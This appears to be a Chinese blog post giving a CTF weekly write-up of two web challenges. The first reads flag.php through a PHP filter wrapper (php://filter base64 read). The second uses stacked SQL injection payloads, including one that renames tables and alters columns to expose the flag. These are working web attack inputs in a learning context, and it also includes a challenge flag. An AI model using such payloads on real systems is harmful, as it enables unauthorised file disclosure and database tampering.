这是个周报

题目一:

进入题目

废话不多说直接查看源代码

发现可疑点,点开看看

得到新源码

发现新文件action.php,打开看看

打开之后开发现了这个

但是看网址感觉有点奇怪

后缀为什么不是原想的action.php而是变为了end.php

看了看网页提示的话,进行抓包.

利用 BurpLoader 进行抓包

发现隐藏文件secr3t.php

打开发现

感觉胜利就在眼前了

打开flag.php

联想到php伪协议, 在后面加上
?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码

解码有

得到flag为

flag{6e4eb0b7-496b-4cba-9db9-ae462e900e57}

题目二:

进入题目

容易看出是SQL注入的题目

先输入1' or 1=1;#试试看能否得到有用信息

目前看来并没有

输入1’; show tables;#

发现两个表,看看里面有什么。

分别输入

0'; show columns from `words`;#

0'; show columns from `1919810931114514`;#

得到

发现flag在1919810931114514这个表中

但是通过前面做题过程中,发现可以看到words表里有两个分别为id data
1919810931114514表里只有一个属性列

那么输入框大概率查询的为words表。

可进行如下操作:

1.先将 words 改为别的名字

2.然后将 1919810931114514 改为 words

3.把属性名flag改为id,通过1’ or 1=1;# 显示flag出来

4.在这之前要先把words表改名

构造playload如下

1';rename table words to words2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);-- q

然后输入1';show tables—q

得到

输入1' or 1=1;#

得到flag

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值